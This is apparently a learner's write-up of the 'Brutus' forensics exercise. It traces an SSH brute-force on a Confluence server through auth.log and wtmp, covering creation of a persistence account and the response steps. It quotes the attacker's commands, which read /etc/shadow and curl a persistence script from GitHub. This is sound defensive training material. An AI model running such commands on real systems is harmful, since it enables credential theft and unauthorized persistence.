Brutus
In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.



Resources:
Auth.log - showed authentication log of failed login / successful login / sudo execution / account creation / account modification
Wtmp file - system log file used by Unix to record user login and logout activities / user sessions

Tools:
utmpdump wtmp

last -f wtmp 

Open Auth.log


Incident:
65.2.161.68 carried out a brute force attack on server 172.31.35.28.

After repeated failed login attempts coming from the user, there was a successful login via SSH into the root user of the account. 

The attacker then manually accessed the server on 2024-03-06 06:32:45, creating session ID 37

Within the root account, there was a creation of an account given sudo / elevated privilege titled “cyberjunkie”. This action employed MITRE ATT&CK sub-technique for persistence (T1136.001)


The account “cyberjunkie” was then logged into by the attacker, which usd sudo in order to find the following commands:

/usr/bin/cat /etc/shadow
-The shadow file contains hashed passwords for all usrs on the system, suggesting the attacker tried further to gain access to more sensitive information.

/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
-The attacker used curl tool to perform installation of an malicious shell script onto the system. 

Response:

Immediately isolate and contain compromised servers to prevent further lateral movement and data exfiltration.

Terminate all unauthorized sessions, and block the malicious IP.

Disable compromised accounts, and audit the system to determine if other accounts were modified / created.

Remove the malicious script curl’d by the attacker, conduct a system-wide scan, and restore critical system files.

Harden security configurations, apply patches onto the system, enforce strong password renewal. 
